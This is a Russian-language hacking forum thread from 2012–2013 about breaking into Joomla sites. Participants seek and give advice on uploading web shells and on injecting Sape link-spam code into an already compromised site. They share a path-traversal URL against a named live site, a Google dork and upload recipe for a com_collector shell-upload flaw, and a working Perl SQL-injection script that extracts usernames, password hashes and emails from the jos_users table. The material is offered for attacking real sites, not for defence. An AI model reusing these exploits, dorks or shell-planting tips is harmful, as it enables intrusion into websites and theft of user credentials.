ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

25.12.2012, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 196
Репутация:
0
|
|
TinyMCE TinyBrowser addon multiple vulnerabilities
Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти Restricted access
http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
Спасибо за помощь.
|
|
|
|

25.12.2012, 23:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Сообщение от iskus
iskus said:
Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти
Restricted access
http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
Спасибо за помощь.
Данная бага актуальна для joomla 1.5.12, которая сейчас практически не встречается и как вы ее собрались использовать я не понимаю.
В joomla заливайте шелл через модули/шаблоны, собственно как и в других CMS...
|
|
|
|

10.01.2013, 20:19
|
|
Новичок
Регистрация: 12.02.2008
Сообщений: 1
Провел на форуме: 16606
Репутация:
0
|
|
Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?
Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
На модули выставлены права разрешающие редактирование
Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)
Заранее благодарен
|
|
|

10.01.2013, 22:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от xaknem
xaknem said:
Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?
Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
На модули выставлены права разрешающие редактирование
Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)
Заранее благодарен
Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
|
|
|

11.01.2013, 00:03
|
|
Новичок
Регистрация: 12.02.2008
Сообщений: 1
Провел на форуме: 16606
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
права на правку только в одном файле который лежит в папке с шаблоном, могу редактировать только его
еще права на редактирование на папки модулей
|
|
|

12.01.2013, 22:27
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
PHP-iclude: com_jomholiday
Сообщение от None
http://jomholiday.comdev.eu/component/jomholiday/index.php?option=com_jomholiday&task=item&id=80%27 d&layout=writeareview/../../../../../../../../../../../../../../../../../../../home/jomholiday/public_html/index
залиться пока не получилось, как зальюсь приведу пример уязвимого кода.
|
|
|

19.01.2013, 19:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 49472
Репутация:
0
|
|
Код:
Code:
# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013
# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP
# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~
# ---------------------------------------
1- Google dork: [inurl:index.php?option=com_collector]
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013
http://www.exploit-db.com/exploits/24228/
|
|
|
|

19.01.2013, 23:03
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от infoseller
infoseller said:
Код:
Code:
# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013
# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP
# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~
# ---------------------------------------
1- Google dork: [inurl:index.php?option=com_collector]
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013
http://www.exploit-db.com/exploits/24228/
P.S: копировать не стоит сплоиты с других ресурсов, если копи пастите, то лудше с раскрытием уязвимого года не болие...
|
|
|

22.01.2013, 20:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 20351
Репутация:
5
|
|
exploit [joomla]
Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
3xpl01t c0d3 :
Код:
Code:
Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
author : *devil-zone.net
greet is to : devil-zone.net *all members
vel = sqlI
S1mPl3 P3rL 3xpl01t3r
Код:
Code:
#!/usr/bin/perl
#greet is to Evil-Dz
system("clear");
print "***************************************\n";
print " * * * * Good Luck & Hafe Fun * * * * *\n";
print " * * * Coded by devil-zone forum * * **\n";
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";
chomp(my $target= );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}
|
|
|
|

01.02.2013, 01:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 229
Репутация:
0
|
|
Сообщение от infoseller
infoseller said:
Код:
Code:
# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013
# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP
# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~
# ---------------------------------------
1- Google dork: [inurl:index.php?option=com_collector]
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013
http://www.exploit-db.com/exploits/24228/
подскажите пожалуйста, как туда залить шелл? выбрать файл, даёт. а кнопка на загрузку не активна.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|